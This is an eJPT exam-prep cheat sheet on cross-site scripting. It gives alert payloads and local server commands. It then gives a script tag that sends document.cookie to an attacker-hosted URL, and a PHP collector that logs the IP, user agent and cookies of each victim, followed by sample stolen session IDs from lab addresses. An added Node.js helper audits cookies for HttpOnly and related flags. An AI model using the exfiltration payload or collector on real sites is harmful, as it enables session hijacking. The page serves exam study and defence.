eJPT Exam Tips and Solution
XSS Attacks

Only works when the website's cookies are not flagged HttpOnly (an HttpOnly cookie is not readable from document.cookie)

XSS Scripts

Basic XSS Payloads

</b><img src=x onerror=alert(document.domain)></img><b>
</b><script>alert(document.domain)</script><b>

Open local File Server

Open local File server Using PHP

php -S 0.0.0.0:80

Open local File server Using Python

python3 -m http.server 80

Get Cookies As Request

Script hosted on the attacker system

<?php
/*
PAYLOAD to be used : 

<script> var i = new Image(); i.src="http://<url_where_this_script_is_placed>/get-data.php?cookie="+escape(document.cookie)</script>
*/

// Source address and User-Agent of the browser that made the request
$ip = $_SERVER['REMOTE_ADDR'];
$browser = $_SERVER['HTTP_USER_AGENT'] ?? '';

// Append each request to the log file
$fp = fopen('gathered_info.txt', 'a');

fwrite($fp, $ip.' '.$browser." \n");
fwrite($fp, urldecode($_SERVER['QUERY_STRING'])." \n\n");
fclose($fp);
?>

Strings (cookie requests) stored in the gathered_info.txt file

192.168.99.100  
cookie=PHPSESSID=3udrbq5j2km5spea10bu7lri07 

192.168.99.11  
cookie=PHPSESSID=il99fdtjli5mq8lvm7k6r07hd0 

192.168.99.100  
cookie=PHPSESSID=il99fdtjli5mq8lvm7k6r07hd0 

192.168.99.11  
cookie=PHPSESSID=dte29r9stjinkki7hlgt3iqe54 

192.168.99.11  
cookie=PHPSESSID=vkhfn0hno94cpg84m0elb7d1d2
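
The PHPSESSID values logged above were readable by script only because the cookie was issued without HttpOnly. The following Node.js helper is an added example, not part of the original page: it audits Set-Cookie headers for the attributes that decide this and returns a corrected header. The function names and the sample header values are assumptions constructed for illustration.

```javascript
// Added example: audit Set-Cookie headers for the attributes that decide
// whether injected script can read the cookie via document.cookie.
// The header strings in `samples` are constructed, not captured traffic.

function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const cookie = {
    name: eq === -1 ? pair : pair.slice(0, eq),
    httpOnly: false,
    secure: false,
    sameSite: null,
  };
  for (const attr of attrs) {
    const [key, value = ''] = attr.split('=');
    switch (key.trim().toLowerCase()) { // attribute names are case-insensitive
      case 'httponly': cookie.httpOnly = true; break;
      case 'secure': cookie.secure = true; break;
      case 'samesite': cookie.sameSite = value.trim().toLowerCase(); break;
    }
  }
  return cookie;
}

// List what is missing from one Set-Cookie header.
function auditSetCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!c.httpOnly) findings.push('readable from document.cookie (no HttpOnly)');
  if (!c.secure) findings.push('sent over plain HTTP (no Secure)');
  if (!c.sameSite) findings.push('no SameSite attribute');
  return { name: c.name, findings };
}

// Return the header with the missing attributes appended.
function hardenSetCookie(header) {
  const c = parseSetCookie(header);
  let out = header.trim().replace(/;\s*$/, '');
  if (!c.httpOnly) out += '; HttpOnly';
  if (!c.secure) out += '; Secure';
  if (!c.sameSite) out += '; SameSite=Lax';
  return out;
}

const samples = [
  'PHPSESSID=constructedsessionvalue; path=/',
  'PHPSESSID=constructedsessionvalue; path=/; secure; HttpOnly; SameSite=Lax',
];
for (const h of samples) console.log(auditSetCookie(h), '->', hardenSetCookie(h));
```

HttpOnly only keeps the cookie out of reach of script; the injection itself still has to be fixed with output encoding.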

Other Resources

Websites to practice XSS attacks:

[1] hack.me

Resources:

[1] The Web Application Hacker's Handbook
[2] OWASP - XSS

Last updated 1 year ago
